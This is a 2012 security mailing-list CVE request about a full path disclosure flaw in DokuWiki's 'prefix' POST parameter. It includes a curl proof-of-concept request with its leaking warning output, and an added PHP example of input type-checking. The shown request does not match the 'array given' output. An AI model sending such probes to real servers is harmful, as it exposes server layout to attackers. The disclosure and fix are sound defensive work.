Date: Sun, 24 Jun 2012 09:40:13 -0300
From: Felipe Pena <felipensp@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: Full path disclosure in DokuWiki

Full path disclosure in DokuWiki
========================================

DokuWiki is a simple to use Wiki aimed at the documentation needs of a small company. It works on plain text files and thus needs no database. It has a simple but powerful syntax which makes sure the datafiles remain readable outside the Wiki.

The POST input 'prefix' is not checked/cast for proper data type before passing to PHP's substr() function, which leads to the display of a warning with sensitive information on servers with PHP error level enabled:

$PRE = cleanText(substr($_POST['prefix'], 0, -1));

$ curl -dprefix=1 http://localhost/dokuwiki/doku.php 2> /dev/null | grep Warning
<b>Warning</b>: substr() expects parameter 1 to be string, array given in <b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/dokuwiki/doku.php:47) in <b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />

Affected versions:
========================================
- Angua (RC1)
- Rincewind
- Anteater

References:
========================================
http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure

Credits:
========================================
This vulnerability was discovered by Felipe Pena.
Twitter: @felipensp

--
Regards,
Felipe Pena
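
Added example, not part of the original message and not DokuWiki's own code: one way to type-check the 'prefix' input before it reaches substr(), with error display turned off as a second layer. The helper names post_str(), clean_text_stub() and read_prefix() are hypothetical, and clean_text_stub() only stands in for the cleanText() call quoted above.

```php
<?php
// Added example: hypothetical helpers, not DokuWiki code.

/**
 * Return $src[$key] only when the client sent a plain string.
 * PHP request parameters can arrive as arrays as well as strings;
 * anything that is not a string is replaced by $default here, so it
 * never reaches substr() and no warning carrying a file path is raised.
 */
function post_str(array $src, string $key, string $default = ''): string
{
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return $default;
    }
    return $src[$key];
}

// Stand-in for cleanText(); assumption: it only normalises line endings.
function clean_text_stub(string $text): string
{
    return str_replace("\r\n", "\n", $text);
}

function read_prefix(array $post): string
{
    // Same expression as in the advisory, but fed a guaranteed string.
    // The cast covers PHP versions where substr() can return false.
    return clean_text_stub((string) substr(post_str($post, 'prefix'), 0, -1));
}

// Defence in depth: log diagnostics instead of rendering them to the client.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Constructed inputs standing in for $_POST.
$cases = [
    'string'  => ['prefix' => "some text."],
    'array'   => ['prefix' => ['1']],
    'missing' => [],
];

foreach ($cases as $label => $post) {
    printf("%-8s => %s\n", $label, var_export(read_prefix($post), true));
}
```

The array and missing cases both yield an empty string, so the response contains no PHP warning and therefore no server path.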